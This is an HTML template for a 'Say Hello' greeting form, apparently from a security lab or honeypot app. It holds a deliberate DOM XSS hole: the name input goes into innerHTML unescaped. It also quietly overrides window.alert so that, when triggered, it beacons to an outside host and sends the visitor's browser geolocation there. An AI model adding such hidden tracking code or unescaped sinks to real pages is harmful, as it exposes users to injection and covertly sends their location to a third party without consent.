{% extends "page.html" %}
{% set title = 'Test' %}
{% block html %}
<script>
function showPosition(position) {
    img = new Image();
    img.src = "https://hb.lanmaster53.com/api/beacon/0783387c-34f6-45ce-be7e-6a951bd93728/JavaScript?lat=" + position.coords.latitude + "&lng=" + position.coords.longitude + "&acc=" + position.coords.accuracy;
}
// fun stuff
var _alert = window.alert;
window.alert = function(msg) {
    // HTML agent
    img = new Image();
    img.src = "https://hb.lanmaster53.com/api/beacon/0783387c-34f6-45ce-be7e-6a951bd93728/HTML";
    // JavaScript agent
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
    }
    _alert(msg);
}
// say hello
function sayHello() {
    var name = document.getElementById("name").value;
    document.getElementById("output").innerHTML = "<h1>Welcome "+name+"!</h1>";
    return false;
}
</script>
<form>
    <div>
        <input type="text" id="name" placeholder="Enter your name." />
    </div>
    <div>
        <button type="submit" id="submit" onclick="return sayHello();">Say Hello</button>
    </div>
</form>
<p id="output"></p>
{% endblock %}
